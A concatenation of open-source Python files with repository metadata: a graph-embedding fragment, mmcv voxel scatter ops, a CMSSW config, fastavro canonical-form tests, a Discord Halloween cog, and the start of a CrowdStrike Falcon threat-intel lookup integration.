for user in range(self.n_users):
index = list(np.where(user_np == user)[0])
i = item_np[index]
for item in i:
H_u[user, item] = 1
H_v[item, user] = 1
D_u[user, user] += 1
D_v[item, item] += 1
print(" constructing user matrix...")
D_n = sp.lil_matrix((user_number, user_number))
D_e = sp.lil_matrix((item_number, item_number))
for i in range(user_number):
D_n[i, i] = 1.0 / max(np.sqrt(D_u[i, i]), epsilon)
for i in range(item_number):
D_e[i, i] = 1.0 / max(D_v[i, i], epsilon)
L_u = I_u - D_n * H_u * D_e * H_u.T * D_n
print(" constructing item matrix...")
D_n = sp.lil_matrix((item_number, item_number))
D_e = sp.lil_matrix((user_number, user_number))
for i in range(item_number):
D_n[i, i] = 1.0 / max(np.sqrt(D_v[i, i]), epsilon)
for i in range(user_number):
D_e[i, i] = 1.0 / max(D_u[i, i], epsilon)
L_v = I_v - D_n * H_v * D_e * H_v.T * D_n
print("Decomposing the laplacian matrices...")
print(" decomposing user matrix...")
[Lamda, user_graph_embeddings] = eigsh(
L_u, k=int(cut_off * self.n_users), which="SM", tol=tolerant
)
print(Lamda[0:10])
print(" decomposing item matrix...")
[Lamda, item_graph_embeddings] = eigsh(
L_v, k=int(cut_off * self.n_items), which="SM", tol=tolerant
)
print(Lamda[0:10])
return [user_graph_embeddings.tolist(), item_graph_embeddings.tolist()]
|
1973febd345f63af40483d65c46c5020399d81c9
|
04142fdda9b3fb29fb7456d5bc3e504985f24cbe
|
/mmcv/ops/scatter_points.py
|
5d881bfe63309fb406c123ee69d4e37125f45843
|
[
"Apache-2.0"
] |
permissive
|
open-mmlab/mmcv
|
419e301bbc1d7d45331d67eccfd673f290a796d5
|
6e9ee26718b22961d5c34caca4108413b1b7b3af
|
refs/heads/main
| 2023-08-31T07:08:27.223321
| 2023-08-28T09:02:10
| 2023-08-28T09:02:10
| 145,670,155
| 5,319
| 1,900
|
Apache-2.0
| 2023-09-14T02:37:16
| 2018-08-22T07:05:26
|
Python
|
UTF-8
|
Python
| false
| false
| 5,886
|
py
|
scatter_points.py
|
# Copyright (c) OpenMMLab. All rights reserved.
from typing import Any, List, Optional, Tuple
import torch
import torch.nn.functional as F
from torch import nn
from torch.autograd import Function
from ..utils import ext_loader
ext_module = ext_loader.load_ext(
'_ext',
['dynamic_point_to_voxel_forward', 'dynamic_point_to_voxel_backward'])
class _DynamicScatter(Function):
@staticmethod
def forward(ctx: Any,
feats: torch.Tensor,
coors: torch.Tensor,
reduce_type: str = 'max') -> Tuple[torch.Tensor, torch.Tensor]:
"""convert kitti points(N, >=3) to voxels.
Args:
feats (torch.Tensor): [N, C]. Points features to be reduced
into voxels.
coors (torch.Tensor): [N, ndim]. Corresponding voxel coordinates
(specifically multi-dim voxel index) of each points.
reduce_type (str, optional): Reduce op. support 'max', 'sum' and
'mean'. Default: 'max'.
Returns:
tuple[torch.Tensor]: A tuple contains two elements. The first one
is the voxel features with shape [M, C] which are respectively
reduced from input features that share the same voxel coordinates.
The second is voxel coordinates with shape [M, ndim].
"""
results = ext_module.dynamic_point_to_voxel_forward(
feats, coors, reduce_type)
(voxel_feats, voxel_coors, point2voxel_map,
voxel_points_count) = results
ctx.reduce_type = reduce_type
ctx.save_for_backward(feats, voxel_feats, point2voxel_map,
voxel_points_count)
ctx.mark_non_differentiable(voxel_coors)
return voxel_feats, voxel_coors
@staticmethod
def backward(ctx: Any,
grad_voxel_feats: torch.Tensor,
grad_voxel_coors: Optional[torch.Tensor] = None) -> tuple:
(feats, voxel_feats, point2voxel_map,
voxel_points_count) = ctx.saved_tensors
grad_feats = torch.zeros_like(feats)
# TODO: whether to use index put or use cuda_backward
# To use index put, need point to voxel index
ext_module.dynamic_point_to_voxel_backward(
grad_feats, grad_voxel_feats.contiguous(), feats, voxel_feats,
point2voxel_map, voxel_points_count, ctx.reduce_type)
return grad_feats, None, None
dynamic_scatter = _DynamicScatter.apply
class DynamicScatter(nn.Module):
"""Scatters points into voxels, used in the voxel encoder with dynamic
voxelization.
Note:
The CPU and GPU implementation get the same output, but have numerical
difference after summation and division (e.g., 5e-7).
Args:
voxel_size (list): list [x, y, z] size of three dimension.
point_cloud_range (list): The coordinate range of points, [x_min,
y_min, z_min, x_max, y_max, z_max].
average_points (bool): whether to use avg pooling to scatter points
into voxel.
"""
def __init__(self, voxel_size: List, point_cloud_range: List,
average_points: bool):
super().__init__()
self.voxel_size = voxel_size
self.point_cloud_range = point_cloud_range
self.average_points = average_points
def forward_single(
self, points: torch.Tensor,
coors: torch.Tensor) -> Tuple[torch.Tensor, torch.Tensor]:
"""Scatters points into voxels.
Args:
points (torch.Tensor): Points to be reduced into voxels.
coors (torch.Tensor): Corresponding voxel coordinates (specifically
multi-dim voxel index) of each points.
Returns:
tuple[torch.Tensor]: A tuple contains two elements. The first one
is the voxel features with shape [M, C] which are respectively
reduced from input features that share the same voxel coordinates.
The second is voxel coordinates with shape [M, ndim].
"""
reduce = 'mean' if self.average_points else 'max'
return dynamic_scatter(points.contiguous(), coors.contiguous(), reduce)
def forward(self, points: torch.Tensor,
coors: torch.Tensor) -> Tuple[torch.Tensor, torch.Tensor]:
"""Scatters points/features into voxels.
Args:
points (torch.Tensor): Points to be reduced into voxels.
coors (torch.Tensor): Corresponding voxel coordinates (specifically
multi-dim voxel index) of each points.
Returns:
tuple[torch.Tensor]: A tuple contains two elements. The first one
is the voxel features with shape [M, C] which are respectively
reduced from input features that share the same voxel coordinates.
The second is voxel coordinates with shape [M, ndim].
"""
if coors.size(-1) == 3:
return self.forward_single(points, coors)
else:
batch_size = coors[-1, 0] + 1
voxels, voxel_coors = [], []
for i in range(batch_size):
inds = torch.where(coors[:, 0] == i)
voxel, voxel_coor = self.forward_single(
points[inds], coors[inds][:, 1:])
coor_pad = F.pad(voxel_coor, (1, 0), mode='constant', value=i)
voxel_coors.append(coor_pad)
voxels.append(voxel)
features = torch.cat(voxels, dim=0)
feature_coors = torch.cat(voxel_coors, dim=0)
return features, feature_coors
def __repr__(self):
s = self.__class__.__name__ + '('
s += 'voxel_size=' + str(self.voxel_size)
s += ', point_cloud_range=' + str(self.point_cloud_range)
s += ', average_points=' + str(self.average_points)
s += ')'
return s
|
d1274119b76521206c53f4d14a8e652501b75a52
|
a5a99f646e371b45974a6fb6ccc06b0a674818f2
|
/CalibCalorimetry/CastorCalib/python/CastorDbProducer_cfi.py
|
6684add760b4c5d63c3d33eb50c749c21e9c4b8d
|
[
"Apache-2.0"
] |
permissive
|
cms-sw/cmssw
|
4ecd2c1105d59c66d385551230542c6615b9ab58
|
19c178740257eb48367778593da55dcad08b7a4f
|
refs/heads/master
| 2023-08-23T21:57:42.491143
| 2023-08-22T20:22:40
| 2023-08-22T20:22:40
| 10,969,551
| 1,006
| 3,696
|
Apache-2.0
| 2023-09-14T19:14:28
| 2013-06-26T14:09:07
|
C++
|
UTF-8
|
Python
| false
| false
| 206
|
py
|
CastorDbProducer_cfi.py
|
import FWCore.ParameterSet.Config as cms
CastorDbProducer = cms.ESProducer( "CastorDbProducer",
appendToDataLabel = cms.string( "" )
)
|
9d2f58c08ef7ea1d28cfc8dbef6b870184575f13
|
e457ef64e939acc769d3b4609184f1603fdd875a
|
/tests/test_canonical_form.py
|
24baaf5fa9e140d543601918c21177fe164345ed
|
[
"Apache-2.0",
"MIT"
] |
permissive
|
fastavro/fastavro
|
dbad8c55fabc9f22b16273ee1a926f22c840c694
|
40dfd526076446cc7f7eef97e40da216b910d047
|
refs/heads/master
| 2023-09-01T04:16:13.510802
| 2023-08-25T10:19:13
| 2023-08-25T11:05:36
| 3,845,895
| 430
| 105
|
MIT
| 2023-09-14T20:14:34
| 2012-03-27T16:29:38
|
Python
|
UTF-8
|
Python
| false
| false
| 14,428
|
py
|
test_canonical_form.py
|
import pytest
from fastavro.schema import to_parsing_canonical_form
from fastavro._schema_common import PRIMITIVES
@pytest.mark.parametrize(
"original_schema,canonical_form",
(
[(primitive, f'"{primitive}"') for primitive in PRIMITIVES]
+ [({"type": primitive}, f'"{primitive}"') for primitive in PRIMITIVES]
),
)
def test_primitive_conversion(original_schema, canonical_form):
assert to_parsing_canonical_form(original_schema) == canonical_form
def test_fullname_conversion():
schema = {
"namespace": "namespace",
"name": "test_fullname_conversion",
"type": "record",
"fields": [],
}
assert (
to_parsing_canonical_form(schema)
== '{"name":"namespace.test_fullname_conversion","type":"record","fields":[]}'
)
def test_fullname_conversion_empty_namespace():
schema = {
"namespace": "",
"name": "test_fullname_conversion_empty_namespace",
"type": "record",
"fields": [],
}
assert (
to_parsing_canonical_form(schema)
== '{"name":"test_fullname_conversion_empty_namespace","type":"record","fields":[]}'
)
def test_fullname_conversion_no_namespace():
schema = {
"name": "test_fullname_conversion_no_namespace",
"type": "record",
"fields": [],
}
assert (
to_parsing_canonical_form(schema)
== '{"name":"test_fullname_conversion_no_namespace","type":"record","fields":[]}'
)
def test_remove_doc():
schema = {"name": "test_remove_doc", "type": "record", "fields": [], "doc": "doc"}
assert (
to_parsing_canonical_form(schema)
== '{"name":"test_remove_doc","type":"record","fields":[]}'
)
def test_remove_aliases():
schema = {
"name": "test_remove_aliases",
"type": "record",
"fields": [],
"aliases": "alias",
}
assert (
to_parsing_canonical_form(schema)
== '{"name":"test_remove_aliases","type":"record","fields":[]}'
)
def test_record_field_order():
schema = {
"fields": [],
"name": "test_record_field_order",
"type": "record",
}
assert (
to_parsing_canonical_form(schema)
== '{"name":"test_record_field_order","type":"record","fields":[]}'
)
def test_enum_field_order():
schema = {
"symbols": ["A", "B"],
"name": "test_enum_field_order",
"type": "enum",
}
assert (
to_parsing_canonical_form(schema)
== '{"name":"test_enum_field_order","type":"enum","symbols":["A","B"]}'
)
def test_array_field_order():
schema = {"items": "int", "type": "array"}
assert to_parsing_canonical_form(schema) == '{"type":"array","items":"int"}'
def test_map_field_order():
schema = {"values": "int", "type": "map"}
assert to_parsing_canonical_form(schema) == '{"type":"map","values":"int"}'
def test_fixed_field_order():
schema = {
"size": 4,
"name": "test_fixed_field_order",
"type": "fixed",
}
assert (
to_parsing_canonical_form(schema)
== '{"name":"test_fixed_field_order","type":"fixed","size":4}'
)
@pytest.mark.parametrize(
"original_schema,canonical_form",
[
(
{
"type": "array",
"items": {"type": "enum", "name": "Test", "symbols": ["A", "B"]},
},
'{"type":"array","items":{"name":"Test","type":"enum","symbols":["A","B"]}}',
),
(
{
"type": "map",
"values": {"type": "enum", "name": "Test", "symbols": ["A", "B"]},
},
'{"type":"map","values":{"name":"Test","type":"enum","symbols":["A","B"]}}',
),
(
["string", "null", "long"],
'["string","null","long"]',
),
(
{
"type": "record",
"name": "Test",
"fields": [{"name": "f", "type": "long"}],
},
'{"name":"Test","type":"record","fields":[{"name":"f","type":"long"}]}',
),
(
{
"type": "error",
"name": "Test",
"fields": [{"name": "f", "type": "long"}],
},
'{"name":"Test","type":"record","fields":[{"name":"f","type":"long"}]}',
),
(
{
"type": "record",
"name": "Node",
"fields": [
{"name": "label", "type": "string"},
{"name": "children", "type": {"type": "array", "items": "Node"}},
],
},
(
'{"name":"Node","type":"record","fields":[{"name":"label","type'
+ '":"string"},{"name":"children","type":{"type":"array","items'
+ '":"Node"}}]}'
),
),
(
{
"type": "record",
"name": "Lisp",
"fields": [
{
"name": "value",
"type": [
"null",
"string",
{
"type": "record",
"name": "Cons",
"fields": [
{"name": "car", "type": "Lisp"},
{"name": "cdr", "type": "Lisp"},
],
},
],
},
],
},
(
'{"name":"Lisp","type":"record","fields":[{"name":"value","type'
+ '":["null","string",{"name":"Cons","type":"record","fields":['
+ '{"name":"car","type":"Lisp"},{"name":"cdr","type":"Lisp"}]}]'
+ "}]}"
),
),
(
{
"type": "record",
"name": "HandshakeRequest",
"namespace": "org.apache.avro.ipc",
"fields": [
{
"name": "clientHash",
"type": {"type": "fixed", "name": "MD5", "size": 16},
},
{"name": "clientProtocol", "type": ["null", "string"]},
{"name": "serverHash", "type": "MD5"},
{
"name": "meta",
"type": ["null", {"type": "map", "values": "bytes"}],
},
],
},
(
'{"name":"org.apache.avro.ipc.HandshakeRequest","type":"record"'
+ ',"fields":[{"name":"clientHash","type":{"name":"org.apache.a'
+ 'vro.ipc.MD5","type":"fixed","size":16}},{"name":"clientProto'
+ 'col","type":["null","string"]},{"name":"serverHash","type":"'
+ 'org.apache.avro.ipc.MD5"},{"name":"meta","type":["null",{"ty'
+ 'pe":"map","values":"bytes"}]}]}'
),
),
(
{
"type": "record",
"name": "HandshakeResponse",
"namespace": "org.apache.avro.ipc",
"fields": [
{
"name": "match",
"type": {
"type": "enum",
"name": "HandshakeMatch",
"symbols": ["BOTH", "CLIENT", "NONE"],
},
},
{"name": "serverProtocol", "type": ["null", "string"]},
{
"name": "serverHash",
"type": ["null", {"name": "MD5", "size": 16, "type": "fixed"}],
},
{
"name": "meta",
"type": ["null", {"type": "map", "values": "bytes"}],
},
],
},
(
'{"name":"org.apache.avro.ipc.HandshakeResponse","type":"record'
+ '","fields":[{"name":"match","type":{"name":"org.apache.avro.'
+ 'ipc.HandshakeMatch","type":"enum","symbols":["BOTH","CLIENT"'
+ ',"NONE"]}},{"name":"serverProtocol","type":["null","string"]'
+ '},{"name":"serverHash","type":["null",{"name":"org.apache.av'
+ 'ro.ipc.MD5","type":"fixed","size":16}]},{"name":"meta","type'
+ '":["null",{"type":"map","values":"bytes"}]}]}'
),
),
(
{
"type": "record",
"name": "Interop",
"namespace": "org.apache.avro",
"fields": [
{"name": "intField", "type": "int"},
{"name": "longField", "type": "long"},
{"name": "stringField", "type": "string"},
{"name": "boolField", "type": "boolean"},
{"name": "floatField", "type": "float"},
{"name": "doubleField", "type": "double"},
{"name": "bytesField", "type": "bytes"},
{"name": "nullField", "type": "null"},
{
"name": "arrayField",
"type": {"type": "array", "items": "double"},
},
{
"name": "mapField",
"type": {
"type": "map",
"values": {
"name": "Foo",
"type": "record",
"fields": [{"name": "label", "type": "string"}],
},
},
},
{
"name": "unionField",
"type": [
"boolean",
"double",
{"type": "array", "items": "bytes"},
],
},
{
"name": "enumField",
"type": {
"type": "enum",
"name": "Kind",
"symbols": ["A", "B", "C"],
},
},
{
"name": "fixedField",
"type": {"type": "fixed", "name": "MD5", "size": 16},
},
{
"name": "recordField",
"type": {
"type": "record",
"name": "Node",
"fields": [
{"name": "label", "type": "string"},
{
"name": "children",
"type": {"type": "array", "items": "Node"},
},
],
},
},
],
},
(
'{"name":"org.apache.avro.Interop","type":"record","fields":[{"'
+ 'name":"intField","type":"int"},{"name":"longField","type":"l'
+ 'ong"},{"name":"stringField","type":"string"},{"name":"boolFi'
+ 'eld","type":"boolean"},{"name":"floatField","type":"float"},'
+ '{"name":"doubleField","type":"double"},{"name":"bytesField",'
+ '"type":"bytes"},{"name":"nullField","type":"null"},{"name":"'
+ 'arrayField","type":{"type":"array","items":"double"}},{"name'
+ '":"mapField","type":{"type":"map","values":{"name":"org.apac'
+ 'he.avro.Foo","type":"record","fields":[{"name":"label","type'
+ '":"string"}]}}},{"name":"unionField","type":["boolean","doub'
+ 'le",{"type":"array","items":"bytes"}]},{"name":"enumField","'
+ 'type":{"name":"org.apache.avro.Kind","type":"enum","symbols"'
+ ':["A","B","C"]}},{"name":"fixedField","type":{"name":"org.ap'
+ 'ache.avro.MD5","type":"fixed","size":16}},{"name":"recordFie'
+ 'ld","type":{"name":"org.apache.avro.Node","type":"record","f'
+ 'ields":[{"name":"label","type":"string"},{"name":"children",'
+ '"type":{"type":"array","items":"org.apache.avro.Node"}}]}}]}'
),
),
(
{
"type": "record",
"name": "ipAddr",
"fields": [
{
"name": "addr",
"type": [
{"name": "IPv6", "type": "fixed", "size": 16},
{"name": "IPv4", "type": "fixed", "size": 4},
],
}
],
},
(
'{"name":"ipAddr","type":"record","fields":[{"name":"addr","typ'
+ 'e":[{"name":"IPv6","type":"fixed","size":16},{"name":"IPv4",'
+ '"type":"fixed","size":4}]}]}'
),
),
(
{
"type": "record",
"name": "TestDoc",
"doc": "Doc string",
"fields": [{"name": "name", "type": "string", "doc": "Doc String"}],
},
(
'{"name":"TestDoc","type":"record","fields":[{"name":"name","ty'
+ 'pe":"string"}]}'
),
),
(
{
"type": "enum",
"name": "Test",
"symbols": ["A", "B"],
"doc": "Doc String",
},
'{"name":"Test","type":"enum","symbols":["A","B"]}',
),
],
)
def test_random_cases(original_schema, canonical_form):
# All of these random test cases came from the test cases here:
# https://github.com/apache/avro/blob/0552c674637dd15b8751ed5181387cdbd81480d5/lang/py3/avro/tests/test_normalization.py
assert to_parsing_canonical_form(original_schema) == canonical_form
|
e37202de46648db3c908a958f5dae661d239c1ed
|
04d9a118a63675c55abe63ccbd8498c6b02f9f80
|
/Cogs/Spooktober.py
|
837c66fb00aae7826aa43ce7c14f5c87696a1812
|
[
"MIT"
] |
permissive
|
corpnewt/CorpBot.py
|
06bd5ddc47adeecdae3ead6138378f9f88fe2b39
|
8c7d8fa412bd9728033bf0c5e0916c6ee9e86423
|
refs/heads/rewrite
| 2023-08-19T05:20:07.877579
| 2023-08-16T23:03:15
| 2023-08-16T23:03:15
| 68,509,454
| 393
| 201
|
MIT
| 2022-09-14T17:21:43
| 2016-09-18T08:59:35
|
Python
|
UTF-8
|
Python
| false
| false
| 1,156
|
py
|
Spooktober.py
|
import asyncio, discord, random, re
from datetime import datetime
from discord.ext import commands
from Cogs import Utils
def setup(bot):
settings = bot.get_cog("Settings")
bot.add_cog(Spooktober(bot, settings))
class Spooktober(commands.Cog):
def __init__(self, bot, settings):
self.bot = bot
self.settings = settings
self.spoop_re = re.compile(r"sp[o0]{2,}(k|p)")
global Utils
Utils = self.bot.get_cog("Utils")
async def message(self, message):
if datetime.today().month == 10 and datetime.today().day == 31:
if not self.settings.getGlobalStat("Spooking", False):
# We have this turned off - bail
return
# it is the day of ultimate sp00p, sp00p all the messages
if self.spoop_re.search(message.content.lower()):
await message.add_reaction("🎃")
@commands.command(pass_context=True)
async def spooking(self, ctx, *, yes_no = None):
"""Enables/Disables reacting 🎃 to every sp00py message on Halloween (owner only)."""
if not await Utils.is_owner_reply(ctx): return
await ctx.send(Utils.yes_no_setting(ctx,"Spooking","Spooking",yes_no,is_global=True))
|
be476df4aac41dcfdbff074a8735f9060f0e0e8d
|
2a1b8a671aceda6bc446f8ce26400aa84fa444a6
|
/Packs/CrowdStrikeIntel/Integrations/CrowdStrikeFalconIntel_v2/CrowdStrikeFalconIntel_v2.py
|
90b3964516b767e86a58c0ac67908432a9870126
|
[
"MIT"
] |
permissive
|
demisto/content
|
6d4722d46f0ff0beea2748e9f7de585bf91a78b4
|
890def5a0e0ae8d6eaa538148249ddbc851dbb6b
|
refs/heads/master
| 2023-09-04T00:02:25.618032
| 2023-09-03T21:56:22
| 2023-09-03T21:56:22
| 60,525,392
| 1,023
| 1,921
|
MIT
| 2023-09-14T20:55:24
| 2016-06-06T12:17:02
|
Python
|
UTF-8
|
Python
| false
| false
| 24,511
|
py
|
CrowdStrikeFalconIntel_v2.py
|
import demistomock as demisto
from CommonServerPython import *
from CommonServerUserPython import *
from datetime import datetime, timezone
from typing import Union, Any, Dict
from dateparser import parse
import urllib3
import traceback
# Disable insecure warnings
urllib3.disable_warnings()
''' GLOBAL VARIABLES '''
MALICIOUS_DICTIONARY: Dict[Any, int] = {
'low': Common.DBotScore.GOOD,
'medium': Common.DBotScore.SUSPICIOUS,
'high': Common.DBotScore.BAD
}
MALICIOUS_THRESHOLD = MALICIOUS_DICTIONARY.get(demisto.params().get('threshold', 'high'))
''' CLIENT '''
class Client:
"""
The integration's client
"""
def __init__(self, params: Dict[str, str], reliability: Optional[DBotScoreReliability] = None):
self.cs_client: CrowdStrikeClient = CrowdStrikeClient(params=params)
self.reliability = reliability
self.query_params: Dict[str, str] = {'offset': 'offset', 'limit': 'limit', 'sort': 'sort', 'free_search': 'q'}
self.date_params: Dict[str, Dict[str, str]] = {
'created_date': {'operator': '', 'api_key': 'created_date'},
'last_updated_date': {'operator': '', 'api_key': 'last_updated'},
'max_last_modified_date': {'operator': '<=', 'api_key': 'last_modified_date'},
'min_last_activity_date': {'operator': '>=', 'api_key': 'first_activity_date'},
'max_last_activity_date': {'operator': '<=', 'api_key': 'last_activity_date'},
}
def build_request_params(self, args: Dict[str, Any]) -> Dict[str, Any]:
"""
Build the params dict for the request
:param args: Cortex XSOAR args
:return: The params dict
"""
params: Dict[str, Any] = {key: args.get(arg) for arg, key in self.query_params.items()}
query = args.get('query')
params['filter'] = query if query else self.build_filter_query(args)
return assign_params(**params)
def build_filter_query(self, args: Dict[str, str]) -> str:
"""
Builds the filter query in Falcon Query Language (FQL)
:param args: Cortex XSOAR args
:return: The query
"""
filter_query: str = str()
for key in args:
if key not in self.query_params:
if key not in self.date_params:
values: List[str] = argToList(args[key], ',')
for value in values:
filter_query += f"{key}:'{value}'+"
else:
operator: Optional[str] = self.date_params.get(key, {}).get('operator')
api_key: Optional[str] = self.date_params.get(key, {}).get('api_key')
# Parsing date argument of ISO format or free language into datetime object,
# replacing TZ with UTC, taking its timestamp format and rounding it up.
parsed_date = parse(args[key])
assert parsed_date is not None
filter_query += f"{api_key}:" \
f"{operator}{int(parsed_date.replace(tzinfo=timezone.utc).timestamp())}+"
if filter_query.endswith('+'):
filter_query = filter_query[:-1]
return filter_query
def get_indicator(self, indicator_value: str) -> Dict[str, Any]:
# crowdstrike do not allow passing single quotes - so we encode them
# we are not encoding the entire indicator value, as the other reserved chars (such as + and &) are allowed
indicator_value = indicator_value.replace("'", "%27")
args: Dict[str, Any] = {
'indicator': indicator_value,
'limit': 1
}
params: Dict[str, Any] = self.build_request_params(args)
return self.cs_client.http_request(method='GET', url_suffix='intel/combined/indicators/v1', params=params)
def cs_actors(self, args: Dict[str, str]) -> Dict[str, Any]:
params: Dict[str, Any] = self.build_request_params(args)
return self.cs_client.http_request(method='GET', url_suffix='intel/combined/actors/v1', params=params)
def cs_indicators(self, args: Dict[str, str]) -> Dict[str, Any]:
params: Dict[str, Any] = self.build_request_params(args)
return self.cs_client.http_request(method='GET', url_suffix='intel/combined/indicators/v1', params=params)
def cs_reports(self, args: Dict[str, str]) -> Dict[str, Any]:
params: Dict[str, Any] = self.build_request_params(args)
return self.cs_client.http_request(method='GET', url_suffix='intel/combined/reports/v1', params=params)
''' HELPER FUNCTIONS '''
def get_dbot_score_type(indicator_type: str) -> Union[Exception, DBotScoreType, str]:
"""
Returns the dbot score type
:param indicator_type: The indicator type
:return: The dbot score type
"""
if indicator_type == 'ip':
return DBotScoreType.IP
elif indicator_type == 'domain':
return DBotScoreType.DOMAIN
elif indicator_type == 'file' or indicator_type == 'hash':
return DBotScoreType.FILE
elif indicator_type == 'url':
return DBotScoreType.URL
else:
raise DemistoException('Indicator type is not supported.')
def get_score_from_resource(r: Dict[str, Any]) -> int:
"""
Calculates the DBotScore for the resource
:param r: The resource
:return: The DBotScore
"""
malicious_confidence: int = MALICIOUS_DICTIONARY.get(r.get('malicious_confidence'), 0)
if malicious_confidence == 3 or MALICIOUS_THRESHOLD == 1:
score = 3
elif malicious_confidence == 2 or MALICIOUS_THRESHOLD == 2:
score = 2
else:
score = 1
return score
def get_indicator_hash_type(indicator_value: str) -> Union[str, Exception]:
"""
Calculates the type of the hash
:param indicator_value: The hash value
:return: The hash type
"""
length: int = len(indicator_value)
if length == 32:
return 'hash_md5'
elif length == 40:
return 'hash_sha1'
elif length == 64:
return 'hash_sha256'
else:
raise DemistoException(f'Invalid hash. Hash length is: {length}. Please provide either MD5 (32 length)'
f', SHA1 (40 length) or SHA256 (64 length) hash.')
def get_indicator_object(indicator_value: Any, indicator_type: str, dbot_score: Common.DBotScore) \
-> Union[Common.IP, Common.URL, Common.File, Common.Domain, None]:
"""
Returns the corresponding indicator common object
:param indicator_value: The indicator value
:param indicator_type: The indicator value
:param dbot_score: The indicator DBotScore
:return: The indicator common object
"""
if indicator_type == 'ip':
return Common.IP(
ip=indicator_value,
dbot_score=dbot_score
)
elif indicator_type == 'url':
return Common.URL(
url=indicator_value,
dbot_score=dbot_score
)
elif indicator_type == 'hash':
hash_type: Union[str, Exception] = get_indicator_hash_type(indicator_value)
if hash_type == 'hash_md5':
return Common.File(
md5=indicator_value,
dbot_score=dbot_score
)
elif hash_type == 'hash_sha1':
return Common.File(
sha1=indicator_value,
dbot_score=dbot_score
)
else:
return Common.File(
sha256=indicator_value,
dbot_score=dbot_score
)
elif indicator_type == 'domain':
return Common.Domain(
domain=indicator_value,
dbot_score=dbot_score
)
else:
return None
def should_filter_resource_by_type(resource, indicator_type, indicator_value):
"""
checks if a resource should be filtered by his type.
:param resource: The resource object
:param indicator_type: The indicator type
:param indicator_value: The indicator value
:return: True if the resource should be filtered (don't match the indicator type) or False otherwise.
"""
# indicator type was not filtered using the query due to a bug in the CrowdStrike API.
if indicator_type == 'hash':
filter_type = get_indicator_hash_type(indicator_value)
elif indicator_type == 'ip':
filter_type = 'ip_address'
else:
filter_type = indicator_type
return resource.get('type') != filter_type
def build_indicator(indicator_value: str, indicator_type: str, title: str, client: Client) -> List[CommandResults]:
"""
Builds an indicator entry
:param indicator_value: The indicator value
:param indicator_type: The indicator type
:param title: The title to show to the user
:param client: The integration's client
:return: The indicator entry
"""
res: Dict[str, Any] = client.get_indicator(indicator_value)
resources: List[Any] = res.get('resources', [])
results: List[CommandResults] = []
if resources:
for r in resources:
if should_filter_resource_by_type(r, indicator_type, indicator_value):
continue
output = get_indicator_outputs(r)
score = get_score_from_resource(r)
dbot_score = Common.DBotScore(
indicator=indicator_value,
indicator_type=get_dbot_score_type(indicator_type),
integration_name='CrowdStrike Falcon Intel v2',
malicious_description='High confidence',
score=score,
reliability=client.reliability
)
indicator = get_indicator_object(indicator_value, indicator_type, dbot_score)
results.append(CommandResults(
outputs=output,
outputs_prefix='FalconIntel.Indicator',
outputs_key_field='ID',
indicator=indicator,
readable_output=tableToMarkdown(name=title, t=output, headerTransform=pascalToSpace),
raw_response=res
))
else:
results.append(create_indicator_result_with_dbotscore_unknown(indicator=indicator_value,
indicator_type=DBotScoreType.FILE
if indicator_type == 'hash' else indicator_type))
return results
def get_values(items_list: List[Any], return_type: str = 'str', keys: Union[str, List[Any]] = 'value') \
-> Union[str, List[Union[str, Dict]]]:
"""
Returns the values of list's items
:param items_list: The items list
:param return_type: Whether to return string or list
:param keys: The key to get the data
:return: The values list
"""
new_list: List[Any] = list()
if isinstance(keys, str):
new_list = [item.get(keys) for item in items_list]
elif isinstance(keys, list):
new_list = [{underscoreToCamelCase(f): item.get(f) for f in item if f in keys} for item in items_list]
if return_type == 'list':
return new_list
return ', '.join(str(item) for item in new_list)
def get_indicator_outputs(resource: Dict[str, Any]) -> Dict[str, Any]:
"""
Build the output and extra context of an indicator
:param resource: The indicator's object
:return: The indicator's human readable
"""
output: Dict[str, Any] = dict()
if resource:
indicator_id = resource.get('id')
indicator_value = resource.get('indicator')
indicator_type = resource.get('type')
last_update = resource.get('last_update')
publish_date = resource.get('publish_date')
malicious_confidence = resource.get('malicious_confidence')
reports = resource.get('reports')
actors = resource.get('actors')
malware_families = resource.get('malware_families')
kill_chains = resource.get('kill_chains')
domain_types = resource.get('domain_types')
ip_address_types = resource.get('ip_address_types')
relations: List[Any] = resource.get('relations', [])[:10]
labels: List[Any] = resource.get('labels', [])[:10]
output = assign_params(**{
'ID': indicator_id,
'Type': indicator_type,
'Value': indicator_value,
'LastUpdate': datetime.fromtimestamp(last_update, timezone.utc).isoformat() if last_update
else None,
'PublishDate': datetime.fromtimestamp(publish_date, timezone.utc).isoformat() if publish_date
else None,
'MaliciousConfidence': malicious_confidence,
'Reports': reports,
'Actors': actors,
'MalwareFamilies': malware_families,
'KillChains': kill_chains,
'DomainTypes': domain_types,
'IPAddressTypes': ip_address_types,
'Relations': [f'{item.get("Type")}: {item.get("Indicator")}' for item in # type: ignore
get_values(relations, return_type='list', keys=['indicator', 'type'])],
'Labels': get_values(labels, return_type='list', keys='name')
})
return output
''' COMMANDS '''
def run_test_module(client: Client) -> Union[str, Exception]:
"""
If a client is successfully constructed then an access token was successfully created,
therefore the username and password are valid and a connection was made.
On top of the above, this function validates the http request to indicators endpoint.
:param client: the client object with an access token
:return: ok if got a valid access token and not all the quota is used at the moment
"""
client.cs_client.http_request('GET', 'intel/combined/indicators/v1', params={'limit': 1})
return 'ok'
def file_command(files: List, client: Client) -> List[CommandResults]:
results: List[CommandResults] = []
for file in files:
results += build_indicator(file, 'hash', 'Falcon Intel file reputation:\n', client)
return results
def ip_command(ips: List, client: Client) -> List[CommandResults]:
results: List[CommandResults] = []
for ip in ips:
results += build_indicator(ip, 'ip', 'Falcon Intel IP reputation:\n', client)
return results
def url_command(urls: List, client: Client) -> List[CommandResults]:
results: List[CommandResults] = []
for url in urls:
results += build_indicator(url, 'url', 'Falcon Intel URL reputation:\n', client)
return results
def domain_command(domains: List, client: Client) -> List[CommandResults]:
results: List[CommandResults] = []
for domain in domains:
results += build_indicator(domain, 'domain', 'Falcon Intel domain reputation:\n', client)
return results
def cs_actors_command(client: Client, args: Dict[str, str]) -> CommandResults:
res: Dict[str, Any] = client.cs_actors(args)
resources: List[Any] = res.get('resources', [])
outputs: List[Dict[str, Any]] = list()
md_outputs: List[Dict[str, Any]] = list()
md: str = str()
title: str = 'Falcon Intel Actor search:'
if resources:
for r in resources:
image_url = r.get('image', {}).get('url')
name = r.get('name')
actor_id = r.get('id')
url = r.get('url')
slug = r.get('slug')
short_description = r.get('short_description')
first_activity_date = r.get('first_activity_date')
last_activity_date = r.get('last_activity_date')
active = r.get('active')
known_as = r.get('known_as')
target_industries = r.get('target_industries', [])
target_countries = r.get('target_countries', [])
origins = r.get('origins', [])
motivations = r.get('motivations', [])
capability = r.get('capability', {}).get('value')
group = r.get('group')
